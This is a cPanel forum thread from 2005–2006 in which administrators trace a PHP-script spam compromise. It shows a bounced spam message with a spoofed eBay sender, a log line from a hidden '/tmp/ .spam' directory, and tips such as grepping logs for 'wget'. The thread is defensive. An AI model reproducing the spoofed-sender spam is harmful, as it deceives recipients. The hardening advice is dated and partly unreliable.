The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Spammer on server . Tracker say original domain is hotmail.com

Discussion in 'E-mail Discussions' started by gundamz, Feb 8, 2005.

  1. gundamz

    gundamz Well-Known Member

    Joined:
    Mar 27, 2002
    Messages:
    245
    Likes Received:
    0
    Trophy Points:
    16
    A spammer use the server to send 60K of emails .
    Here's the record.
    Strange is , the orginal domain indicate hotmail.com . I can't find any X-mailer to track down the cuplict. Can some experts tell me how i can track down the domain on the server that spam?



    This is a MIME-formatted message.
    Portions of this message may be unreadable without a MIME-capable mail program.

    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: text/plain; charset=unicode-1-1-utf-7

    This is an automatically generated Delivery Status Notification.

    Delivery to the following recipients failed.

    baligat@hotmail.com




    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: message/delivery-status

    Reporting-MTA: dns;mc7-f25.hotmail.com
    Received-From-MTA: dns;hostname.myserver.com
    Arrival-Date: Mon, 7 Feb 2005 08:28:23 -0800

    Final-Recipient: rfc822;baligat@hotmail.com
    Action: failed
    Status: 5.2.2
    Diagnostic-Code: smtp;552 5.2.2 This message is larger than the current system limit or the recipient's mailbox is full. Create a shorter message body or remove attachments and try sending it again.

    --9B095B5ADSN=_01C50C8201CDBA4E0001ADBCmc7?f25.hotmail.
    Content-Type: message/rfc822

    Received: from hostname.myserver.com ([70.84.70.148]) by mc7-f25.hotmail.com with Microsoft SMTPSVC(6.0.3790.211);
    Mon, 7 Feb 2005 08:28:23 -0800
    Received: from nobody by hostname.myserver.com with local (Exim 4.43)
    id 1CyBkT-00011o-6Q
    for baligat@hotmail.com; Tue, 08 Feb 2005 00:28:29 +0800
    To: baligat@hotmail.com
    Subject: We are currently hiring 12-18 email Customer Service Representatives
    From: Evridic Systems <aw-confirm@ebay.com>
    Reply-To: resume@Evridic.com
    MIME-Version: 1.0
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit
    Message-Id: <E1CyBkT-00011o-6Q@hostname.myserver.com>
    Date: Tue, 08 Feb 2005 00:28:29 +0800
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - hostname.myserver.com
    X-AntiAbuse: Original Domain - hotmail.com
    X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
    X-AntiAbuse: Sender Address Domain - hostname.myserver.com
    X-Source:
    X-Source-Args:
    X-Source-Dir:
    Return-Path: nobody@hostname.myserver.com
    X-OriginalArrivalTime: 07 Feb 2005 16:28:23.0241 (UTC) FILETIME=[0AE7B390:01C50D32]

    <html>
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    The key line in the header record is:

    Received: from nobody by hostname.myserver.com with local (Exim 4.43)

    This suggests that you have a vulnerable PHP script being exploited for sending out spam:

    1. Make sure that all phpBB forums have been upgraded to the latest release (install cPanel Pro, install Addon Script Manager, run the Addon Script Manager)

    2. Install mod_security with a good set of recent Filters (search the forums)

    3. Enable extended exim logging by going into WHM > Exim Configuration Editor > Advanced Mode > in first textbox:

    log_selector = +all

    You'll then get extended logging in exim to help you trace back future reported spams which should hopefully expose the culprit script.
     
  3. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I'm currently having a similar problem with my mail server. It appears to have the same symptoms as the previous poster. I've tried all of the previous suggestions, and so far seen no change in the amount of mail (a few hours later). Where would I find the exim logs to check for the originator?
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    I don't really see how you could have tried all previous suggestions if you don't know where your mail server logs are :rolleyes:

    On linux, they're with your other server logs in:
    /var/log/exim_mainlog
     
  5. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Thank you. I'd tried everything up to reading the Exim logs as I did not know where to find them. The problem appears to have tailed off after your other suggestions. Thanks for the help.
     
  6. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Sorry about the terse response, I was dealing with a troll in a different thread just before replying to your question :eek:
     
  7. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I understand, it happens. I'm still having trouble with spam though. I've followed all of your suggestions (the exim log is so large that I have a hard time easily paging through it). Otherwise, I just keep trying to clear the mail queue, and work on that. My apologies for my newbness to this, but is there any easy way to track which, if any, script could be doing the mail sending?
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
  9. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Here's what I've done so far:
    Installed mod_security.
    Installed APF
    Enabled Advanced Logging for Exim
    Now, reading through the exim log after I enabled the logging, I am finding some odd things. Example: cwd=/tmp/ .spam 3 args: /usr/sbin/sendmail -t -i. What exactly would I be looking for if a script was being abused, or if I was rootkitted?
     
  10. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Code:
    cwd=/tmp/ .spam
    Looks like you've got some bad files in your /tmp partition. Look through there and delete suspicious files... (sounds like .spam (if it exists) should be the first to go).

    Then, you'll probably need to grep through your apache/httpd domlogs to find the insecure script(s) that the bad things are getting in through. For instance, you can search for "tmp" and "wget".

    If you don't understand anything I said, then searching this forum would probably help you find the answer (search button at the top of every page). And searching at google.com can also be quite helpful.

    But it sounds like there's a number of things you can still do to secure your server (secure /tmp, and restrict permissions for wget, etc)... I suggest hiring a competent server admin to secure your server for you, and then learning from what he did and keep it up. It's really the least you can do if you'd like to avoid headaches likes staying up all night trying to fix damage to the server, trying to recover your customer's data, trying to avoid days of downtime, etc.
     
  11. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    I second the "Hire a Pro" comment, with server prices at such apparently low prices ( I say apparent as most newbs forget to take into account that they really are not qualified to run a dedicated server and competent help really is a requirement if you plan on staying online and not blacklisted)

    Even if it is only for a few months, if a person does not know where basic logs are located, how to modify a DNS entry, understand the http.conf file, and have some decent command line ability with your chosen OS. You really are just kidding yourself and disaster is actually only days away.

    Will kind of put the kabosh on 1Gig disk for 1$ deals that seem to be poping up with even more regularity.......
     
    #11 RandyO, Feb 10, 2005
    Last edited: Feb 10, 2005
  12. jmoe2008

    jmoe2008 Member

    Joined:
    Jan 18, 2005
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    I've cleaned up the /tmp directory, mod_security is installed, along with APF, and BFD. I think I've taken care of the spam problem. The .spam directory doesn't want to be deleted (there seem to be some hidden files), but I've set the permissions so that it shouldn't be accessible through PHP. Otherwise, everything seems fine now. I also made wget non-executable by CHModding it to 750. Thanks for the help and suggestions.
     
    #12 jmoe2008, Feb 10, 2005
    Last edited: Feb 10, 2005
  13. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    849
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    Heya Jonathan.

    I have noticed my exim config currently has

    log_selector = -host_lookup_failed -lost_incoming_connection

    Would

    log_selector = +all -host_lookup_failed -lost_incoming_connection

    work?

    Also, +All includes

    +address_rewrite +all_parents +arguments +connection_reject +delay_delivery +delivery_size +dnslist_defer +incoming_interface +incoming_port +lost_incoming_connection +queue_run +received_sender +received_recipients +retry_defer +sender_on_delivery +size_reject +skip_delivery +smtp_confirmation +smtp_connection +smtp_protocol_error +smtp_syntax_error +subject +tls_cipher +tls_peerdn

    correct?


     
    #13 Solokron, Sep 21, 2005
    Last edited: Sep 21, 2005
  14. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yup. +all includes everything and is much more sensible than listing each and every option, IMO.
     
  15. Solokron

    Solokron Well-Known Member

    Joined:
    Aug 8, 2003
    Messages:
    849
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Seattle
    cPanel Access Level:
    DataCenter Provider
    And log_selector = +all -host_lookup_failed -lost_incoming_connection

    works and cleans up the logs a little correct?

     
  16. centaur777

    centaur777 Active Member

    Joined:
    Apr 9, 2004
    Messages:
    34
    Likes Received:
    0
    Trophy Points:
    6
    An interesting thread. Leaves a few things untouched though.

    1. I was wondering if adding log_selector = +all would affect WHM->Mail Stats? What I mean is will the additional arguments be shown through WHM interface under View Mail Stats?

    For that matter does increasing Tweak Settings->Stats Log Level from 1 to say 5 put more information in View Mail Stats?

    2. What is the default log_selector setting on a default WHM box?

    3. You add log_selector = +all then remove it later from the WHM interface. Does that leave Exim with the default (earlier) setting for log_selector?

    Thanks n Bye
     
    #16 centaur777, Feb 8, 2006
    Last edited: Feb 8, 2006
  17. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
Loading...

Share This Page